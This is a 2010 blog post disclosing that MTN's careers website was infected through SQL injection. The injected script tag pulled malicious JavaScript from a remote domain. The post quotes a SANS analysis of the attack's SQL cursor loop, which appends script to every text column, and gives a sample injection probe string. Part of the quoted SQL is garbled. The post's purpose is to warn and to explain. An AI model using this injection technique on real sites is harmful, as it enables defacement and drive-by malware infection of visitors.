Saturday, September 4, 2010

Careers@MTN website INFECTED with MALWARE

Careers@MTN website INFECTED with MALWARE.

URL compromised: http://careers.mtnonline.com
Threat level: HIGH (Do NOT visit for now)

I was going through the site 'Nairaland.com' and came across the 'Jobs & Vacancies' board. A vacancy from MTN caught my attention and this link re-directed me to Careers @ MTN http://careers.mtnonline.com .

Now going through the URL http://careers.mtnonline.com, i discovered a script was being called from www.adword71.com(obviously from the loading pane in Firefox). My curious self took the better part of me so i decided to dig up what I could.



A quick Ctrl+U was done and d result is below.




Meaning once you click on any link there, the javascript file 'b.js' gets to run.

Now the question is 'WHAT IS b.js?' and 'WHAT DOES IT DO?'

b.js is a malicious Javascript file that gets executed on a User's PC when such user visits websites infected with it. The script looks for various vulnerabilities specific to the visiting OS, and when it finds one pulls a .Mov file from the domain dedicated www.adword71.com. That in turn invokes a file which installs a backdoor on end users' machines. Victims are unlikely to know they've been infected because the installation is seamless, and the malware uses few PC resources.

Mode of Attack

The only way this attack coulda happened is through SQL INJECTION. The exploit was 1st seen in the yr 2008 and it was posted on SANS http://isc.sans.edu/diary.html?n&storyid=4294 . After http://careers.mtnonline.com must have been discovered vulnerable to SQLI, the ‘attacker’ made sure the exploit payload was delivered which executed an iterative SQL loop that located every user-created table in the remote database and then appended every text column within the table with a malicious client-side script(in this case ‘b.js’).

As most database-driven Web applications use data in the database to dynamically construct Web content, eventually the script would be presented to a user of the compromised Web site (http://careers.mtnonline.com). The tag will instruct any browser that loads the infected Web page to execute a malicious script (b.js) being hosted on a remote server (www.adword71.com). The purpose of this is to infect as many hosts with malware as possible. As seen in this case, this was a very SUCCESSFUL attack.

Am surprised it hasn’t been patched by MTN till now. An SQL Injection is very much possible as this code makes the server goof up an ASP.NET error

Code
departments.asp?id=1’ OR ‘1’=’1




As posted on SANs by Johannes Ullrich, the ‘technical’ analysis is below

Lets go over this line by line:

First, two variables (T and C) are declared

DECLARE @T VARCHAR(255),@C VARCHAR(255) Next, we declare a "table_cursor". A table cursor will receive the output of a query line by line. It's essentially a "for" loop over all results returned by the query.

DECLARE @T VARCHAR(255),@C VARCHAR(255) The cursor is defined for the following query:
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

This SQL query uses one particular trick: sysobject is a special table in SQL Server. It lists all the other tables available. syscolumns works similar for all columns found in these tables.

The query selects all "objects" with an xtype of "u". These are tables created by the user. System tables (like "sysobjects" and "syscolumns" are ignored). Next, it limits it to columns of type 35 (text), 231 (sysname) and 167 (varchar). These are datatypes that can hold a string of characters.

Our "cursor" will now retrieve all the results, and assign them to the variables "T" (table name) and "C" (column name)


The next sql statement will use these variables:

BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
"")

For all values of these selected columns, the malicious javascript is added. As a result, you will see the javascript littered throughout the application. Wherever the website is using a string from the database, the javascript is now added. You frequently see it as part of the title tag.


As in this case, http://careers.mtnonline.com is littered with it.

A quick virus scan from AVG and Virus Total shows the following

1.) AVG

Exploit: Script injection 358 This page probably has a script reference injected into it. Generally, these pages are corrupted, rather than infective, but they are still potentially dangerous. This is known internally as type 358. Risk Category: Exploit Description: XPL's Intelligence Network has detected an exploit. An exploit is a piece of malware code that takes advantage of a vulnerability in a software application, usually the operating system or a web browser to infect a computer. Exploits usually target a computer by means of a drive-by download – the user has no idea that a download has even taken place. XPL recommends NOT visiting this web site regardless if your computer has been patched for the vulnerability. Scanned: Friday, September 03, 2010.



2.) VIRUS TOTAL





CONCLUSION

It’s funny lotta Graduates wants that top job @ MTN and that will take them to http://careers.mtnonline.com . Now imagine how many people’s computers are at present infected & compromised as WebsiteOutlook shows mtnonline.com is getting 43257 page views per day. Do NOT visit the site till it gets fixed. Meanwhile MTN have been contacted; let’s hope they do something about it.

No comments:

Post a Comment